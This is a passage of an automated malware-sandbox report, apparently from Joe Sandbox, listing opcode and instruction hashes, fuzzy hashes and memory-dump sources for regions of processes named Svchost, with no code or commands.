                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC127F20B28A194FE7A8FBB884B56B972D6FF99315F440579E44EC32D2DE3DA8018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f230c93cf02accddc81afb02aede36de8afe8ae6741bd4f7eee2017dcb5c99d1
                                                                                                                                                                                                          • Instruction ID: a68bd4dd2d9019a36ec32dcddd3c99a3b18a9acfc3d5956cd835e5cf0406561d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f230c93cf02accddc81afb02aede36de8afe8ae6741bd4f7eee2017dcb5c99d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51FF20B0E6C90FE796A77858B6275ABD5DF97316B0804FEE08DC7193DD185806D342
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e824455fa10afabe30ce4d100e5af3f10cc24534058aa8a49de3b777e1e293a7
                                                                                                                                                                                                          • Instruction ID: c3e83eefb7c58a597df81859508be3b68e103c9214386c8eb600e8a01c8b86a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e824455fa10afabe30ce4d100e5af3f10cc24534058aa8a49de3b777e1e293a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B331C621B18A095FEB54BBEC58693BEB7E5EF99351F54027AE00DC32D2DD2868418392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3a9b0588837a2dfcca568c88ecff5f5bb4cf1749fc04843e70bbbd1bbaad7bc3
                                                                                                                                                                                                          • Instruction ID: c69c2b219f18bc44a8796367344526c8a3360e25b4ac3dac7f00465c4dc85039
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a9b0588837a2dfcca568c88ecff5f5bb4cf1749fc04843e70bbbd1bbaad7bc3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15318034B18A0E5FDB54EBE8C4756ADBBF1FF99301F54457AD009D3286DE38A8418790
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2f6294bbdbae588c424bf9febcf6a9fb00aee3a9d133225e9a7af025710695bd
                                                                                                                                                                                                          • Instruction ID: c61528db750ab79c428f9ae7acb51f42f82bb5e613ca34d4927393eceab44659
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6294bbdbae588c424bf9febcf6a9fb00aee3a9d133225e9a7af025710695bd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA014214A0C7800FE742A73858B1566BFE09F93200B4805BBD88AC70E7DD08A9858382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9af6186efcfbb79a9c504e178f9ac420a3e89fc88168ab0b605956926f139cca
                                                                                                                                                                                                          • Instruction ID: 7e34742a2e478dc909180258ae27cc3d4f00664adde2105cf25c15cddbc70d06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af6186efcfbb79a9c504e178f9ac420a3e89fc88168ab0b605956926f139cca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2632B420B29A094FEB98EBBC84B567977D2FF99740F5405B9E50ED32C2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9aa13066788c8248447e9b60eb0ac07cb122eb0820739f0475dbea1245fceee6
                                                                                                                                                                                                          • Instruction ID: 5c09d396bb2f8c1c01f46e6cdb6f1da791a8afab5782db7056edcd25cbd69c46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa13066788c8248447e9b60eb0ac07cb122eb0820739f0475dbea1245fceee6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC512020B0E6C90FE796AB7858B5279BFD5DF87216B0804FEE08DC72A3DD485806C352
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8c455ccef71c434264a30f55cdbdd2606fef32ee8517afb9328a7558cb50bb88
                                                                                                                                                                                                          • Instruction ID: 3f914d931218905d2f933b01f6f43438077212027c0bb0efb1ffc32bcba712ba
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c455ccef71c434264a30f55cdbdd2606fef32ee8517afb9328a7558cb50bb88
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B715921B1EA8A0FE795EB6C98751B97BE1EF87210B0401BED54DD7293DD6C6C028350
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2808727cfb5e2d5f0753b8d9d7f9bed3cde5e60f824da22dd6299097c7197b0e
                                                                                                                                                                                                          • Instruction ID: 17026f395c06cef4c4795b4115f9ca14e3b6447310b113ad8b60f536b5bac58e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2808727cfb5e2d5f0753b8d9d7f9bed3cde5e60f824da22dd6299097c7197b0e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28319521B1D9490FE798FB6C946A37DA7C2EF99351F0405BEE44EC7293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction ID: 7041502b50169f345e977a1411268c5c48f1e6ba4af3fac69319e5c48018af46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31B421B19A095FEB94BBFC58693BE77D1EF99311F0402BAE00DC32D2DD6C68418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 08d62a0a20f6f067a6edab5c31154763aa0deb5a89359b936803e13b92c76722
                                                                                                                                                                                                          • Instruction ID: fc5156ed9cc619d4cb9312ceafa0148103fc8989eb521f3e27367b2d0ba76de7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d62a0a20f6f067a6edab5c31154763aa0deb5a89359b936803e13b92c76722
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15317E34B18A1A8FEB95EBA8C4B56ED7BF1FF99340F540579D109D3286CE3868428790
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cf019eb1b2b1bb9cfa44b5eac7abcb0d25bf66bb7ad5b99da642c01ba2b3e260
                                                                                                                                                                                                          • Instruction ID: 009461f86b1f33b269f6d3b12a211779ccf6ffca071ecfcc953e3648b6acb513
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf019eb1b2b1bb9cfa44b5eac7abcb0d25bf66bb7ad5b99da642c01ba2b3e260
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E014215A0E7800FE792E73858B15667FE29F97240B4C05BAD988C70E7DD0CA981C392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: fda73d4226a250b73f73739bd9ed47ab57a7c7f2a52319910b1393f13497d95b
                                                                                                                                                                                                          • Instruction ID: eb308a6018a7a454b0da12bb82e53afd78df7513915c95c607ac4b91ff8bf1ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fda73d4226a250b73f73739bd9ed47ab57a7c7f2a52319910b1393f13497d95b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA32A420B1AA0A4BE798EBBC84B5679B7D2FF99301F54057DE54EC32D2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: af3ce79240ee3e4251d7d080e6bd7621355d7a48694b2d27dfd6ca2ac0687bc4
                                                                                                                                                                                                          • Instruction ID: 3cc7c6ff05a80f9b7dc8135cdfd52358817ca9034d23a6384156fe6cf26279ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af3ce79240ee3e4251d7d080e6bd7621355d7a48694b2d27dfd6ca2ac0687bc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF511F10B0E6C90FE796AB7858B5279BFD5DF87216B0804FEE08DC72A3DD485806C352
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bc67a42b9e5711b19853d06672161367e28b489775fe12ad4dd22ed7a0d1a0fb
                                                                                                                                                                                                          • Instruction ID: c9dfefbe41a6d4e24929dac092a8c045699eb2a0276cb1ddf536e94c5271d3f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc67a42b9e5711b19853d06672161367e28b489775fe12ad4dd22ed7a0d1a0fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14712A21B1EA8A0FE795EB6C98751B97BE2EF87211B0801BED44DC7293DD6C6C428351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1a0f30e50403163da6acd21ca0528b93964c85d5acfda645acf4c21e78088b47
                                                                                                                                                                                                          • Instruction ID: 06f7a886e4f70f0172bb095c22f61d9c07bd50589c8ff395a231f501963d4de9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0f30e50403163da6acd21ca0528b93964c85d5acfda645acf4c21e78088b47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1319521B1D9490FE798FB6C946A37DA7C2EF99351F0405BEE44EC7293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction ID: 7041502b50169f345e977a1411268c5c48f1e6ba4af3fac69319e5c48018af46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31B421B19A095FEB94BBFC58693BE77D1EF99311F0402BAE00DC32D2DD6C68418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c40c2d0d7cafe95d29ff0430e7431ecbb4223c2f5c498d26ed39f6be10f5ba81
                                                                                                                                                                                                          • Instruction ID: f93118315fc6f69ad1301257d89bd0171262d871b990ee4bdd227551985dcb33
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40c2d0d7cafe95d29ff0430e7431ecbb4223c2f5c498d26ed39f6be10f5ba81
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD318F34B19A0E9FEB44EBA8C4B56AE7BF1FF89301F540579D109D3286DE78A842C750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 56a21a4ba6c2fce279dd1e3bb4cc7b18ce4391e90724bb7530f243b7f62471a9
                                                                                                                                                                                                          • Instruction ID: 87fe14d80feb4ddabe8eb8e7c86290d91f15150215e0965982c107e532a960b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a21a4ba6c2fce279dd1e3bb4cc7b18ce4391e90724bb7530f243b7f62471a9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92014205A0E7810FE792EB3C58B15667FE19F83200B4C05BAD9C8C70E7ED0CA981C392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 58bcd162def11e24d66bd7ada26db5e2f6f7d760422de7c9198c408388086e90
                                                                                                                                                                                                          • Instruction ID: 14c37e94253c540277f1ef2abbfabde1cebeb45b2661068c6b6f0f0ee6efc94f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bcd162def11e24d66bd7ada26db5e2f6f7d760422de7c9198c408388086e90
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2327261B2CA494FE798EBAC84B56B97BD2FF99300F54057DE40ED32D2DE38A8018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
Uniqueness
Uniqueness Score: -1.00%
